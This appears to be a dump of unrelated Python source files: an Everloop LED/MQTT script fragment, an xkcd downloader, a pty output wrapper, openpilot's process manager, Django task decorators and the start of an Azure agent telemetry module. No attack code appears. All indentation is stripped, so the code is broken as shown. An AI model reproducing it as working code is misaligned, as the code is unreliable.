client.on_connect = on_connect
client.on_publish = on_publish
client.on_subscribe = on_subscribe
client.on_log = on_log
while rc == 0:
rc = client.loop()
if(flag):
# Create a new driver config
driver_config_proto = driver_pb2.DriverConfig()
# Create an empty Everloop image
image = []
# For each device LED
if(Color=="red"):
for led in range(ledCount):
# Set individual LED value
ledValue = io_pb2.LedValue()
ledValue.blue = 0
ledValue.red = 100
ledValue.green = 0
ledValue.white = 0
image.append(ledValue)
elif(Color=="blue"):
for led in range(ledCount):
# Set individual LED value
ledValue = io_pb2.LedValue()
ledValue.blue = 100
ledValue.red = 0
ledValue.green = 0
ledValue.white = 0
image.append(ledValue)
elif(Color=="green"):
client.publish("esp/lock", "Hello")
for led in range(ledCount):
# Set individual LED value
ledValue = io_pb2.LedValue()
ledValue.blue = 0
ledValue.red = 0
ledValue.green = 100
ledValue.white = 0
image.append(ledValue)
else:
for led in range(ledCount):
# Set individual LED value
ledValue = io_pb2.LedValue()
ledValue.blue = 10
ledValue.red = 10
ledValue.green = 10
ledValue.white = 0
image.append(ledValue)
# Store the Everloop image in driver configuration
driver_config_proto.image.led.extend(image)
# Send driver configuration through ZMQ socket
socket.send(driver_config_proto.SerializeToString())
#Wait before restarting loop
time.sleep(10)
# Create a new driver config
driver_config_proto = driver_pb2.DriverConfig()
# Create an empty Everloop image
image = []
# For each device LED
for led in range(ledCount):
# Set individual LED value
ledValue = io_pb2.LedValue()
ledValue.blue = 10
ledValue.red = 10
ledValue.green = 10
ledValue.white = 0
image.append(ledValue)
# Store the Everloop image in driver configuration
driver_config_proto.image.led.extend(image)
# Send driver configuration through ZMQ socket
socket.send(driver_config_proto.SerializeToString())
flag=False
if __name__ == "__main__":
# Initiate asynchronous events
ioloop.install()
# Start Error Port connection
Process(target=register_error_callback, args=(everloop_error_callback, matrix_ip, everloop_port)).start()
# Ping the Keep-alive Port once
ping_socket()
# Start Data Update Port connection & close after response
update_socket()
# Send Base Port configuration
try:
config_socket(led_count)
# Avoid logging Everloop errors on user quitting
except KeyboardInterrupt:
print(' quit')
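The four nearly identical LED loops in config_socket() each build a solid-colour Everloop image; that pattern could be factored into a helper such as the sketch below (the helper name is made up; the proto calls mirror the ones used above):

from matrix_io.proto.malos.v1 import driver_pb2, io_pb2

def solid_everloop_config(led_total, red=0, green=0, blue=0, white=0):
    """Build a DriverConfig whose Everloop image is a single solid colour."""
    config = driver_pb2.DriverConfig()
    image = []
    for _ in range(led_total):
        led = io_pb2.LedValue()
        led.red, led.green, led.blue, led.white = red, green, blue, white
        image.append(led)
    config.image.led.extend(image)
    return config

# e.g. socket.send(solid_everloop_config(led_count, green=100).SerializeToString())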
multidownloadXkcd.py
#! python3
# multidownloadXkcd.py - Downloads XKCD comics using multiple threads.
import requests, os, bs4, threading
os.makedirs('xkcd', exist_ok=True) # store comics in ./xkcd
def downloadXkcd(startComic, endComic):
for urlNumber in range(startComic, endComic):
# Download the page.
print('Downloading page http://xkcd.com/%s...' % (urlNumber))
res = requests.get('http://xkcd.com/%s' % (urlNumber))
res.raise_for_status()
soup = bs4.BeautifulSoup(res.text, 'html.parser')
# Find the URL of the comic image.
comicElem = soup.select('#comic img')
if comicElem == []:
print('Could not find comic image.')
else:
comicUrl = comicElem[0].get('src')
# Download the image.
print('Downloading image %s...' % (comicUrl))
res = requests.get(comicUrl)
res.raise_for_status()
# Save the image to ./xkcd
imageFile = open(os.path.join('xkcd', os.path.basename(comicUrl)), 'wb')
for chunk in res.iter_content(100000):
imageFile.write(chunk)
imageFile.close()
# Create and start the Thread objects.
downloadThreads = [] # a list of all the Thread objects
for i in range(0, 1400, 100): # loops 14 times, creates 14 threads
downloadThread = threading.Thread(target=downloadXkcd, args=(i, i + 99))
downloadThreads.append(downloadThread)
downloadThread.start()
# Wait for all threads to end.
for downloadThread in downloadThreads:
downloadThread.join()
print('Done.')
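The manual thread bookkeeping above can also be written with the standard library's concurrent.futures; a sketch of the same fan-out, reusing the downloadXkcd function defined above:

from concurrent.futures import ThreadPoolExecutor

with ThreadPoolExecutor(max_workers=14) as executor:
    futures = [executor.submit(downloadXkcd, i, i + 99) for i in range(0, 1400, 100)]
    for future in futures:
        future.result()  # re-raises any download error from the worker
print('Done.')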
run_silent_if_successful.py
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import pty
import signal
import subprocess
import sys
import threading
master_pty_fd, slave_pty_fd = pty.openpty()
read_data = []
def master_pty_fd_reader():
while True:
try:
data = os.read(master_pty_fd, 1024)
except OSError:
return
else:
if data:
read_data.append(data)
else:
return
master_pty_fd_reader_thread = threading.Thread(target=master_pty_fd_reader)
master_pty_fd_reader_thread.start()
pid = None
def handler(signal_number, frame):
if not pid:
return
os.kill(pid, signal_number)
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
signal.signal(signal.SIGHUP, handler)
try:
popen = subprocess.Popen(
sys.argv[1:],
stdin=subprocess.DEVNULL,
stdout=slave_pty_fd,
stderr=slave_pty_fd,
)
except FileNotFoundError as e:
print(str(e), file=sys.stderr)
os.close(slave_pty_fd)
master_pty_fd_reader_thread.join()
sys.exit(127)
pid = popen.pid
returncode = popen.wait()
os.close(slave_pty_fd)
master_pty_fd_reader_thread.join()
if returncode:
for data in read_data:
os.write(sys.stdout.fileno(), data)
sys.exit(returncode)
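Usage sketch: the wrapper replays the captured pty output only when the wrapped command exits non-zero, so it is handy around noisy build steps. Invoking it from another Python script (the command and script path are hypothetical):

import subprocess

result = subprocess.run(["./run_silent_if_successful.py", "make", "-j4"])
# result.returncode mirrors the wrapped command; its output was shown only if it failed.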
manager.py
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR
from common.hardware import HARDWARE, ANDROID, PC
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1040
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit status
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
from common.text_window import TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if __name__ != "__main__":
spinner.close()
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed, log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'logcatd',
'tombstoned',
'sensord',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'proclogd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if WEBCAM:
car_started_processes += [
'dmonitoringd',
'dmonitoringmodeld',
]
if not PC:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'gpsd',
'rtshield',
]
# starting dmonitoringmodeld when modeld is initializing can sometimes result in a weird
# snpe state where dmon constantly uses more cpu than normal.
car_started_processes += ['modeld']
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /sdcard/unkillable_reboot")
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
HARDWARE.reboot(reason="recovery")
def main():
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n \n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
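Other modules can hook into the manager through register_managed_process(); a sketch with made-up process names, following the two descriptor formats used in managed_processes above (the import path selfdrive.manager is an assumption):

from selfdrive.manager import register_managed_process

# Python process: the descriptor is a module path handed to launcher()
register_managed_process("mydaemon", "selfdrive.mydaemon", car_started=False)

# native process: the descriptor is (cwd relative to BASEDIR, argv)
register_managed_process("mysensor", ("selfdrive/mysensor", ["./mysensor"]), car_started=True)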
decorators.py
import logging, functools, time, os
from functools import wraps
from functools import partial
from ratelimit.decorators import ratelimit
from django.conf import settings
from django.http import Http404
from django.shortcuts import redirect
from django.contrib import messages
import sys
logger = logging.getLogger('engine')
import threading
def is_moderator(f):
def inner(request, **kwargs):
user = request.user
if user.is_authenticated and user.profile.is_moderator:
return f(request, **kwargs)
messages.warning(request, "You need to be a moderator to perform this action.")
return redirect('/')
return inner
def reset_count(key):
"""
Set value of given key in settings.SESSION_COUNT_KEY to 0.
"""
session_key = settings.SESSION_COUNT_KEY
def outer(func):
@wraps(func)
def inner(request, **kwargs):
# Get the count from sessions
counts = request.session.get(session_key, {})
counts[key] = 0
request.session[session_key] = counts
return func(request, **kwargs)
return inner
return outer
def check_params(allowed):
"""
Validate that only the allowed parameters are present in request.GET.
"""
def outer(func):
@wraps(func)
def inner(request, **kwargs):
incoming = set(request.GET.keys())
# Expected parameter names.
diff = incoming - allowed
if diff:
logger.error(f"invalid get request parameters {diff}")
raise Http404("Parameter does not exist.")
return func(request, **kwargs)
return inner
return outer
def limited(key, rate):
"""
Make a blocking rate limiter that does not raise an exception
"""
def outer(func):
@ratelimit(key=key, rate=rate)
def inner(request, **kwargs):
was_limited = getattr(request, 'limited', False)
if was_limited:
msg = "Too many requests from same IP address. Temporary ban."
messages.warning(request, msg)
raise Http404(msg)
return func(request, **kwargs)
return inner
return outer
def timeit(func):
"""
Log how long the function takes.
"""
@wraps(func)
def inner(*args, **kwargs):
start = time.time()
val = func(*args, **kwargs)
delta = int((time.time() - start) * 1000)
msg = f"time={delta}ms for {func.__name__}"
if delta > 1000:
msg = f'SLOW: {msg}'
logger.info(msg)
else:
logger.debug(msg)
return val
return inner
def check_lock(lock):
"""
Check if lock directory exists before calling function
"""
def __inner(func):
def __wrapper(*args, **kwargs):
if os.path.isdir(lock):
logger.warning('Lock directory detected, function is already running')
sys.exit()
# Try to run function
try:
# Make the lock directory
os.makedirs(lock, exist_ok=True)
out = func(*args, **kwargs)
except Exception as exc:
logger.error(exc)
out = None
finally:
# Clean the locks.
os.rmdir(lock)
# Return function output
return out
return __wrapper
return __inner
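# Illustrative sketch (not part of the original module): serializing a
# hypothetical management command with a lock directory. The lock path is made
# up; a second invocation exits early while the directory exists. Never called.
def _example_check_lock_usage():
    import tempfile
    @check_lock(lock=os.path.join(tempfile.gettempdir(), "example_task.lock"))
    def nightly_task():
        logger.info("running nightly task")
    return nightly_task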
def d_timer():
"""
Return disabled timer.
"""
class inner(object):
def __init__(self, secs, **kwargs):
self.secs = secs
def __call__(self, f, *args, **kwargs):
pass
return inner
def b_timer():
"""
Return blocking timer
"""
class inner(object):
def __init__(self, secs, **kwargs):
self.secs = secs
def __call__(self, func, *args, **kwargs):
func(*args, **kwargs)
return inner
def t_timer():
"""
Return threaded timer
"""
class inner(object):
def __init__(self, secs, **kwargs):
self.secs = secs
def __call__(self, func, *args, **kwargs):
# The loop repeats the timer.
def loop():
ticker = threading.Event()
while not ticker.wait(self.secs):
func(*args, **kwargs)
# Run process in separate thread, once.
logger.info(f"new timer thread for function {func} {args} {kwargs}")
t = threading.Thread(target=loop, daemon=True)
t.start()
return inner
def u_timer():
"""
Return uwsgi timer
"""
from uwsgidecorators import timer
return timer
def c_timer():
"""
Construct a celery timer decorator.
Inside the __call__, it dynamically adds the given function to the beat schedule.
Adapted from:
https://docs.celeryproject.org/en/master/userguide/periodic-tasks.html#beat-entries
"""
from biostar.celery import app
class inner(object):
def __init__(self, secs, **kwargs):
self.secs = secs
# Registering through the on_after_configure signal avoids evaluating the app
# at module level when calling f(); the Celery docs suggest on_after_finalize
# instead when the tasks live outside the module that declares the app.
@app.on_after_configure.connect
def __call__(self, f, *args, **kwargs):
f = app.task(f)
# Add the entry to the beat_schedule.
app.add_periodic_task(schedule=self.secs,
sig=f,
kwargs=kwargs,
args=args,
name=f.__name__)
return inner
def thread(*args, **kwargs):
"""
Return a threaded worker
"""
def outer(func, **kwargs):
@functools.wraps(func)
def inner(*args, **kwargs):
# Run process in separate thread.
logger.debug(f"new thread for function {func} {args} {kwargs}")
t = threading.Thread(target=func, args=args, kwargs=kwargs, daemon=True)
t.start()
# Gains an attribute called spool that runs the function in the background.
inner.spool = inner
inner.delay = inner
return inner
return outer
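# Illustrative sketch (not part of the original module): running a hypothetical
# notification job in a background daemon thread; .spool/.delay are the
# uwsgi/celery style aliases added above. Nothing calls this wrapper.
def _example_thread_usage():
    @thread()
    def notify(user_id):
        logger.info(f"notifying user {user_id}")
    notify(1)         # runs in a daemon thread
    notify.delay(2)   # same call through the celery-style alias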
def u_worker():
"""
Return a uwsgi spooler compatible with celery interface
"""
# Ensure uwsgi is installed.
from uwsgidecorators import spool
def inner(f):
"""
Alias to call .spool when calling .delay
@spooler
def job(foo):
pass
# Uwsgi type of launch
job.spool(foo='')
# Celery type of launch
job.delay(foo='')
"""
worker = spool(pass_arguments=True)(f)
# Compatible with celery interface.
worker.delay = worker.spool
return worker
return inner
def c_worker():
"""
Return a celery worker compatible with uwsgi interface
"""
from biostar.celery import app
def inner(f):
"""
Alias to call .delay when calling .spool
@spooler
def job(foo):
pass
# Uwsgi type of launch
job.spool(foo='')
# Celery type of launch
job.delay(foo='')
"""
worker = app.task(f)
# Compatible with uwsgi interface.
worker.spool = worker.delay
return worker
return inner
def b_worker():
"""
Return a blocking decorator that runs the function once.
"""
def outer(func, *args, **kwargs):
@functools.wraps(func)
def inner(*args, **kwargs):
logger.debug(f"running {func} {args} {kwargs}")
return func(*args, **kwargs)
inner.spool = inner
inner.delay = inner
return inner
return outer
def d_worker():
"""
Return a d_worker decorator that does nothing
"""
def outer(func, *args, **kwargs):
@functools.wraps(func)
def inner(*args, **kwargs):
pass
inner.spool = inner
inner.delay = inner
return inner
return outer
def t_worker():
"""
Wrap a threaded worker so it matches the worker interface.
"""
def inner(f):
worker = thread()(f)
return worker
return inner
def select_runner(name):
"""
Return runner based on name ( worker or timer ) and settings.TASK_RUNNER.
"""
mapper = {
'block': {'worker': b_worker, 'timer': b_timer},
'uwsgi': {'worker': u_worker, 'timer': u_timer},
'celery': {'worker': c_worker, 'timer': c_timer},
'threaded': {'worker': t_worker, 'timer': t_timer},
'disable': {'worker': d_worker, 'timer': d_timer},
}
if settings.TASK_RUNNER not in mapper:
logger.error(f"Invalid TASK_RUNNER. Valid options: {list(mapper.keys())}")
raise Exception('Invalid task.')
# Call the selected factory and return the resulting worker/timer decorator.
decorator = mapper.get(settings.TASK_RUNNER)[name]()
return decorator
try:
# Initiate the runners
WORKER = select_runner('worker')
TIMER = select_runner('timer')
logger.debug(f'workers and timers set to {settings.TASK_RUNNER}')
except Exception as exc:
# Disable tasks when there are errors; raising exceptions here would break migrations.
WORKER = d_worker()
TIMER = d_timer()
logger.error(f'Error initializing task: {settings.TASK_RUNNER}.')
logger.error(f'Tasks disabled: {exc}.')
def task(f):
"""
Utility function to access worker decorator.
"""
return WORKER(f)
def timer(f):
"""
Utility function to access timer decorator.
"""
return TIMER(f)
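# Illustrative sketch (not part of the original module): the task/timer helpers
# in use. The function names, arguments and the 300-second interval are made up,
# and which backend actually runs them depends on settings.TASK_RUNNER; the
# wrapper below is never called.
def _example_task_and_timer_usage():
    @task
    def create_award(user_id):
        logger.info(f"awarding user {user_id}")
    @timer(300)
    def update_index(*args, **kwargs):
        logger.info("updating the search index")
    create_award.delay(user_id=1)  # celery-style launch; aliased for every backend above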
|
collect_telemetry_events.py
|
# Microsoft Azure Linux Agent
#
# Copyright 2020 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import json
import os
import re
import threading
import traceback
from collections import defaultdict
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common import conf
from azurelinuxagent.common.agent_supported_feature import get_supported_feature_by_name, SupportedFeatureNames
from azurelinuxagent.common.event import EVENTS_DIRECTORY, TELEMETRY_LOG_EVENT_ID, \
TELEMETRY_LOG_PROVIDER_ID, add_event, WALAEventOperation, add_log_event, get_event_logger, \
CollectOrReportEventDebugInfo, EVENT_FILE_REGEX, parse_event
from azurelinuxagent.common.exception import InvalidExtensionEventError, ServiceStoppedError
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.interfaces import ThreadHandlerInterface
from azurelinuxagent.common.telemetryevent import TelemetryEvent, TelemetryEventParam, \
GuestAgentGenericLogsSchema, GuestAgentExtensionEventsSchema
from azurelinuxagent.ga.exthandlers import HANDLER_NAME_PATTERN
from azurelinuxagent.ga.periodic_operation import PeriodicOperation
def get_collect_telemetry_events_handler(send_telemetry_events_handler):
return CollectTelemetryEventsHandler(send_telemetry_events_handler)
class ExtensionEventSchema(object):
"""
Class for defining the schema for Extension Events.
Sample Extension Event Example:
{
"Version": "1.0.0.23",
"Timestamp": "2018-01-02T22:08:12.510696Z",  // time in UTC (ISO-8601 standard)
"TaskName": "TestRun",  // open for publishers
"EventLevel": "Critical/Error/Warning/Verbose/Informational/LogAlways",
"Message": "Successful test",  // max 3K (3072) characters
"EventPid": "1",
"EventTid": "2",
